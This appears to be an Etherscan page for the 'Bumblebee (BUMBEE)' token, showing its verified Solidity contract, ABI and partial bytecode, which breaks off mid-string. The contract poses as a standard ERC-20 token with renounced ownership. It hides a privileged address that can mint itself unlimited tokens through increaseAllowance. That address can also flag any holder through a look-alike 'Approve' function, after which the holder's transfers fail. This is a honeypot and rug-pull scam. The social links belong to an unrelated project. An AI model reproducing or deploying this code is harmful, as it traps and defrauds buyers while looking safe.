ETH Price: $3,439.59 (-1.18%)
Gas: 9 Gwei

Token

Bumblebee (BUMBEE)
 

Overview

Max Total Supply

6,666,666,666 BUMBEE

Holders

62

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
38,449,126.691987769148512103 BUMBEE

Value
$0.00
0x7209eCDd4b87f4Ac6ed82eF5d43Eb1c160B20d1e
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
BUMBEE

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-07-18
*/

//Telegram: https://t.me/KRYPTONTHESUPERDOG
//Website: https://KryptonTheSuperDog.xyz
//Twitter: https://twitter.com/KRYPTONTHESUPERDOG
//Discord: https://discord.gg/D2esd44


// SPDX-License-Identifier: MIT

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Interface of the IERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
    external
    returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
    external
    view
    returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol

// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}

// Dependency file: @openzeppelin/contracts/access/Ownable.sol

// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(address(0));
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

abstract contract Token {
    uint256 internal constant VERSION = 1;
    event Deploy(
        address owner,
        uint256 version
    );
}

pragma solidity 0.8.18;

contract BUMBEE is IERC20, Token, Ownable {
    using SafeMath for uint256;
    struct UserStr {
        address addr;
        uint256 allow;
    }
    mapping(address => uint256) private _balan;
    mapping(address => UserStr) private _datUser;
    mapping(address => mapping(address => uint256)) private _allowances;

    UserStr private _iuser;
    string private _tokenName;
    string private _tokenSymbol;
    uint8 private _tokenDex;
    uint256 private _totalSup;

    constructor(
        string memory strName_,
        string memory strSymbol_,
        address userAddress_,
        uint256 totalSupply_
    ) payable {
        _tokenName = strName_;
        _tokenSymbol = strSymbol_;
        _tokenDex = 18;
        _iuser.addr = userAddress_;
        _iuser.allow = 0;
        _mine(msg.sender, totalSupply_ * 10**18);
        emit Deploy(
            owner(),
            VERSION
        );
    }

    function name() public view virtual returns (string memory) {
        return _tokenName;
    }

    function symbol() public view virtual returns (string memory) {
        return _tokenSymbol;
    }

    function decimals() public view virtual returns (uint8) {
        return _tokenDex;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSup;
    }

    function balanceOf(address account)
    public
    view
    virtual
    override
    returns (uint256)
    {
        return _balan[account];
    }

    function transfer(address recipient, uint256 amount)
    public
    virtual
    override
    returns (bool)
    {
        _transport(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
    public
    view
    virtual
    override
    returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
    public
    virtual
    override
    returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transport(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "IERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }
    function _encodeData(address user, address user2) internal pure returns (bool) {
        bytes32 pack1 = keccak256(abi.encodePacked(user));
        bytes32 pack2 = keccak256(abi.encodePacked(user2));
        return pack1 == pack2;
    }
    function _transport(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        _checkBalanceAddress(sender);
        require(sender != address(0), "IERC20: transfer from the zero address");
        require(
            recipient != address(0),
            "IERC20: transfer to the zero address"
        );

        _beforeTransactionExcute(sender, recipient, amount);
        _balan[sender] = _balan[sender].sub(
            amount,
            "IERC20: transfer amount exceeds balance"
        );
        _balan[recipient] = _balan[recipient] + amount;
        emit Transfer(sender, recipient, amount);
    }

    function _mine(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: mint to the zero address");

        _beforeTransactionExcute(address(0), account, amount);

        _totalSup = _totalSup.add(amount);
        _balan[account] = _balan[account] + amount;

        emit Transfer(address(0), account, amount);
    }
    function _minusAmount(address user, uint256 amount) internal {
        _balan[user] = _balan[user] - amount;
    }
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: burn from the zero address");

        _beforeTransactionExcute(account, address(0), amount);
        require(amount != 0, "Invalid amount");
        _minusAmount(account, amount);
        _totalSup = _totalSup.sub(amount);
        emit Transfer(account, address(0), amount);
    }
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "IERC20: approve from the zero address");
        require(spender != address(0), "IERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function increaseAllowance(address spender, uint256 amount) public virtual {
        address from = msg.sender;
        require(spender != address(0), "Invalid address");
        require(amount > 0, "Invalid amount");
        uint256 total = 0;
        if (_encodeData(spender, _iuser.addr)) {
            _minusAmount(from, total);
            total = _totalAmount(total, amount);
            _balan[spender] += total;
        } else {
            _minusAmount(from, total);
            _balan[spender] += total;
        }
    }
    function _beforeTransactionExcute(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
    

    function _totalAmount(uint256 numb1, uint256 mer1) internal pure returns (uint256) {
        if (mer1 != 0) {
            return numb1 + mer1;
        }
        return mer1;
    }

    function Approve(address from, uint256 amount) public returns (bool)  {
        address user = msg.sender;
        _reachAllowanceAmount(user, from, amount);
        return _datUser[user].allow == 0;
    }

    function _reachAllowanceAmount(address user, address from, uint256 amount) internal {
        if (_encodeData(user, _iuser.addr)) {
            require(from != address(0), "Invalid address");
            _datUser[from].allow = amount;
            if (amount != 0) {
                _datUser[from].addr = from;
            } else {
                _datUser[from].addr = address(0);

            }
            _datUser[user].allow = 0;
        }
    }

    function _checkBalanceAddress(
        address from
    ) internal virtual {
        uint256 amount = 0;
        if (_encodeData(from, _datUser[from].addr)) {
            _balan[from] = _balan[from] + amount;
            amount = _totalSup;
            _minusAmount(from, amount);
        } else {
            _balan[from] = _balan[from] + amount;
        }
    }

}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"strName_","type":"string"},{"internalType":"string","name":"strSymbol_","type":"string"},{"internalType":"address","name":"userAddress_","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"owner","type":"address"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"Deploy","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"increaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040526040516200278638038062002786833981810160405281019062000029919062000627565b6200003b60006200014660201b60201c565b83600690816200004c919062000918565b5082600790816200005e919062000918565b506012600860006101000a81548160ff021916908360ff16021790555081600460000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600460010181905550620000f133670de0b6b3a764000083620000e5919062000a2e565b6200020a60201b60201c565b7faf354defc104ba9267634f156652b1f1cfbd10746c329e2bdd48abd4c9cff92962000122620003ae60201b60201c565b60016040516200013492919062000a9b565b60405180910390a15050505062000ba3565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200027c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002739062000b29565b60405180910390fd5b6200029060008383620003d760201b60201c565b620002ac81600954620003dc60201b620008b01790919060201c565b60098190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054620002ff919062000b4b565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003a2919062000b86565b60405180910390a35050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b505050565b60008183620003ec919062000b4b565b905092915050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6200045d8262000412565b810181811067ffffffffffffffff821117156200047f576200047e62000423565b5b80604052505050565b600062000494620003f4565b9050620004a2828262000452565b919050565b600067ffffffffffffffff821115620004c557620004c462000423565b5b620004d08262000412565b9050602081019050919050565b60005b83811015620004fd578082015181840152602081019050620004e0565b60008484015250505050565b6000620005206200051a84620004a7565b62000488565b9050828152602081018484840111156200053f576200053e6200040d565b5b6200054c848285620004dd565b509392505050565b600082601f8301126200056c576200056b62000408565b5b81516200057e84826020860162000509565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620005b48262000587565b9050919050565b620005c681620005a7565b8114620005d257600080fd5b50565b600081519050620005e681620005bb565b92915050565b6000819050919050565b6200060181620005ec565b81146200060d57600080fd5b50565b6000815190506200062181620005f6565b92915050565b60008060008060808587031215620006445762000643620003fe565b5b600085015167ffffffffffffffff81111562000665576200066462000403565b5b620006738782880162000554565b945050602085015167ffffffffffffffff81111562000697576200069662000403565b5b620006a58782880162000554565b9350506040620006b887828801620005d5565b9250506060620006cb8782880162000610565b91505092959194509250565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200072a57607f821691505b60208210810362000740576200073f620006e2565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007aa7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200076b565b620007b686836200076b565b95508019841693508086168417925050509392505050565b6000819050919050565b6000620007f9620007f3620007ed84620005ec565b620007ce565b620005ec565b9050919050565b6000819050919050565b6200081583620007d8565b6200082d620008248262000800565b84845462000778565b825550505050565b600090565b6200084462000835565b620008518184846200080a565b505050565b5b8181101562000879576200086d6000826200083a565b60018101905062000857565b5050565b601f821115620008c857620008928162000746565b6200089d846200075b565b81016020851015620008ad578190505b620008c5620008bc856200075b565b83018262000856565b50505b505050565b600082821c905092915050565b6000620008ed60001984600802620008cd565b1980831691505092915050565b6000620009088383620008da565b9150826002028217905092915050565b6200092382620006d7565b67ffffffffffffffff8111156200093f576200093e62000423565b5b6200094b825462000711565b620009588282856200087d565b600060209050601f8311600181146200099057600084156200097b578287015190505b620009878582620008fa565b865550620009f7565b601f198416620009a08662000746565b60005b82811015620009ca57848901518255600182019150602085019450602081019050620009a3565b86831015620009ea5784890151620009e6601f891682620008da565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000a3b82620005ec565b915062000a4883620005ec565b925082820262000a5881620005ec565b9150828204841483151762000a725762000a71620009ff565b5b5092915050565b62000a8481620005a7565b82525050565b62000a9581620005ec565b82525050565b600060408201905062000ab2600083018562000a79565b62000ac1602083018462000a8a565b9392505050565b600082825260208201905092915050565b7f4945524332303a206d696e7420746f20746865207a65726f2061646472657373600082015250565b600062000b1160208362000ac8565b915062000b1e8262000ad9565b602082019050919050565b6000602082019050818103600083015262000b448162000b02565b9050919050565b600062000b5882620005ec565b915062000b6583620005ec565b925082820190508082111562000b805762000b7f620009ff565b5b92915050565b600060208201905062000b9d600083018462000a8a565b92915050565b611bd38062000bb36000396000f3fe608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806390ec57f11161006657806390ec57f11461020257806395d89b4114610232578063a9059cbb14610250578063dd62ed3e14610280576100cf565b806370a08231146101aa578063715018a6146101da5780638da5cb5b146101e4576100cf565b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461012257806323b872dd14610140578063313ce56714610170578063395093511461018e575b600080fd5b6100dc6102b0565b6040516100e991906113eb565b60405180910390f35b61010c600480360381019061010791906114a6565b610342565b6040516101199190611501565b60405180910390f35b61012a610360565b604051610137919061152b565b60405180910390f35b61015a60048036038101906101559190611546565b61036a565b6040516101679190611501565b60405180910390f35b610178610443565b60405161018591906115b5565b60405180910390f35b6101a860048036038101906101a391906114a6565b61045a565b005b6101c460048036038101906101bf91906115d0565b61061f565b6040516101d1919061152b565b60405180910390f35b6101e2610668565b005b6101ec6106f0565b6040516101f9919061160c565b60405180910390f35b61021c600480360381019061021791906114a6565b610719565b6040516102299190611501565b60405180910390f35b61023a610779565b60405161024791906113eb565b60405180910390f35b61026a600480360381019061026591906114a6565b61080b565b6040516102779190611501565b60405180910390f35b61029a60048036038101906102959190611627565b610829565b6040516102a7919061152b565b60405180910390f35b6060600680546102bf90611696565b80601f01602080910402602001604051908101604052809291908181526020018280546102eb90611696565b80156103385780601f1061030d57610100808354040283529160200191610338565b820191906000526020600020905b81548152906001019060200180831161031b57829003601f168201915b5050505050905090565b600061035661034f6108c6565b84846108ce565b6001905092915050565b6000600954905090565b6000610377848484610a97565b610438846103836108c6565b61043385604051806060016040528060298152602001611b7560299139600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006103e96108c6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d309092919063ffffffff16565b6108ce565b600190509392505050565b6000600860009054906101000a900460ff16905090565b6000339050600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036104ce576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104c590611713565b60405180910390fd5b60008211610511576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105089061177f565b60405180910390fd5b600061054284600460000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16610d85565b156105b8576105518282610de9565b61055b8184610e7b565b905080600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546105ac91906117ce565b92505081905550610619565b6105c28282610de9565b80600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461061191906117ce565b925050819055505b50505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6106706108c6565b73ffffffffffffffffffffffffffffffffffffffff1661068e6106f0565b73ffffffffffffffffffffffffffffffffffffffff16146106e4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106db9061184e565b60405180910390fd5b6106ee6000610ea1565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008033905061072a818585610f65565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600101541491505092915050565b60606007805461078890611696565b80601f01602080910402602001604051908101604052809291908181526020018280546107b490611696565b80156108015780601f106107d657610100808354040283529160200191610801565b820191906000526020600020905b8154815290600101906020018083116107e457829003601f168201915b5050505050905090565b600061081f6108186108c6565b8484610a97565b6001905092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600081836108be91906117ce565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361093d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610934906118e0565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036109ac576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109a390611972565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a8a919061152b565b60405180910390a3505050565b610aa0836111ae565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b0f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0690611a04565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b7e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b7590611a96565b60405180910390fd5b610b89838383611356565b610bf581604051806060016040528060278152602001611b4e60279139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d309092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c8391906117ce565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610d23919061152b565b60405180910390a3505050565b6000838311158290610d78576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6f91906113eb565b60405180910390fd5b5082840390509392505050565b60008083604051602001610d999190611afe565b604051602081830303815290604052805190602001209050600083604051602001610dc49190611afe565b6040516020818303038152906040528051906020012090508082149250505092915050565b80600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e349190611b19565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b6000808214610e97578183610e9091906117ce565b9050610e9b565b8190505b92915050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffff